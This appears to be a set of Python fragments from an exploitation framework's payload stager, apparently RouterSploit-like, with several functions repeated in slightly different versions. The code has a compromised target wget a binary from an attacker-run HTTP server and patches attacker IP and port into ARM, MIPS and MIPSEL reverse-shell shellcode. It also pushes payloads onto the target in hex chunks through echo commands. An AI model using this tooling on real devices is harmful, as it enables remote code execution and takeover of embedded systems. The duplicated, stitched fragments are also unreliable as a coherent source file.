def wget(self):
print_status("Using wget method")
self.binary_name = random_text(8)
if "binary" in self.wget_options.keys():
binary = self.wget_options['binary']
else:
binary = "wget"
# run http server
self.mutex = True
thread = threading.Thread(target=self.http_server,
args=(self.options['lhost'],
self.options['lport']))
thread.start()
while self.mutex:
pass
if self.port_used:
print_error("Could not set up HTTP Server on {}:{}".format(
self.options['lhost'], self.options['lport']))
return False
# wget binary
print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -O {}/{}".format(
binary, self.options['lhost'], self.options['lport'],
self.binary_name, self.location, self.binary_name)
self.exploit.execute(cmd)
return True
def wget(self):
print_status("Using wget method")
self.binary_name = random_text(8)
if "binary" in self.wget_options.keys():
binary = self.wget_options['binary']
else:
binary = "wget"
# run http server
self.mutex = True
thread = threading.Thread(target=self.http_server, args=(self.options['lhost'], self.options['lport']))
thread.start()
while self.mutex:
pass
if self.port_used:
print_error("Could not set up HTTP Server on {}:{}".format(self.options['lhost'], self.options['lport']))
return False
# wget binary
print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -O {}/{}".format(binary,
self.options['lhost'],
self.options['lport'],
self.binary_name,
self.location,
self.binary_name)
self.exploit.execute(cmd)
return True
def generate_binary(self, lhost, lport):
print_status("Generating reverse shell binary")
self.binary_name = random_text(8)
ip = self.convert_ip(lhost)
port = self.convert_port(lport)
if self.arch == "arm":
self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10A] + port + self.arm[0x10C:]
elif self.arch == "mipsel":
self.revshell = (
self.mipsel[:0xE4]
+ port
+ self.mipsel[0xE6:0xF0]
+ ip[2:]
+ self.mipsel[0xF2:0xF4]
+ ip[:2]
+ self.mipsel[0xF6:]
)
elif self.arch == "mips":
self.revshell = (
self.mips[:0xEA]
+ port
+ self.mips[0xEC:0xF2]
+ ip[:2]
+ self.mips[0xF4:0xF6]
+ ip[2:]
+ self.mips[0xF8:]
)
else:
print_error("Platform not supported")
def generate_binary(self, lhost, lport):
print_status("Generating reverse shell binary")
self.binary_name = random_text(8)
ip = self.convert_ip(lhost)
port = self.convert_port(lport)
if self.arch == 'arm':
self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10a] + port + self.arm[0x10c:]
elif self.arch == 'mipsel':
self.revshell = self.mipsel[:0xe4] + port + self.mipsel[0xe6:0xf0] + ip[2:] + self.mipsel[0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
else:
print_error("Platform not supported")
def generate_binary(self, lhost, lport):
print_status("Generating reverse shell binary")
self.binary_name = random_text(8)
ip = self.convert_ip(lhost)
port = self.convert_port(lport)
if self.arch == 'arm':
self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10a] + port + self.arm[0x10c:]
elif self.arch == 'mipsel':
self.revshell = self.mipsel[:0xe4] + port + self.mipsel[0xe6:0xf0] + ip[2:] + self.mipsel[0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
elif self.arch == 'mips':
self.revshell = self.mips[:0xea] + port + self.mips[0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[2:] + self.mips[0xf8:]
else:
print_error("Platform not supported")
def echo(self):
print_status("Using echo method")
self.binary_name = random_text(8)
path = "{}/{}".format(self.location, self.binary_name)
# echo stream e.g. echo -ne {} >> {}
if "stream" in self.echo_options.keys():
echo_stream = self.echo_options['stream']
else:
echo_stream = 'echo -ne "{}" >> {}'
# echo prefix e.g. "\\x"
if "prefix" in self.echo_options.keys():
echo_prefix = self.echo_options['prefix']
else:
echo_prefix = "\\x"
# echo max length of the block
if "max_length" in self.echo_options.keys():
echo_max_length = int(self.echo_options['max_length'])
else:
echo_max_length = 30
size = len(self.payload)
num_parts = (size / echo_max_length) + 1
# transfer binary through echo command
print_status("Sending payload to {}".format(path))
for i in range(0, num_parts):
current = i * echo_max_length
print_status("Transferring {}/{} bytes".format(
current, len(self.payload)))
block = self.payload[current:current +
echo_max_length].encode('hex')
block = echo_prefix + echo_prefix.join(
a + b for a, b in zip(block[::2], block[1::2]))
cmd = echo_stream.format(block, path)
self.exploit.execute(cmd)
def echo(self):
print_status("Using echo method")
self.binary_name = random_text(8)
path = "{}/{}".format(self.location, self.binary_name)
# echo stream e.g. echo -ne {} >> {}
if "stream" in self.echo_options.keys():
echo_stream = self.echo_options['stream']
else:
echo_stream = 'echo -ne "{}" >> {}'
# echo prefix e.g. "\\x"
if "prefix" in self.echo_options.keys():
echo_prefix = self.echo_options['prefix']
else:
echo_prefix = "\\x"
# echo max length of the block
if "max_length" in self.echo_options.keys():
echo_max_length = int(self.echo_options['max_length'])
else:
echo_max_length = 30
size = len(self.payload)
num_parts = (size / echo_max_length) + 1
# transfer binary through echo command
print_status("Sending payload to {}".format(path))
for i in range(0, num_parts):
current = i * echo_max_length
print_status("Transferring {}/{} bytes".format(current, len(self.payload)))
block = self.payload[current:current + echo_max_length].encode('hex')
block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2]))
cmd = echo_stream.format(block, path)
self.exploit.execute(cmd)
def __init__(self, exploit, payload, options):
self.exploit = exploit
self.payload = payload
self.options = options
self.binary_name = random_text(8)
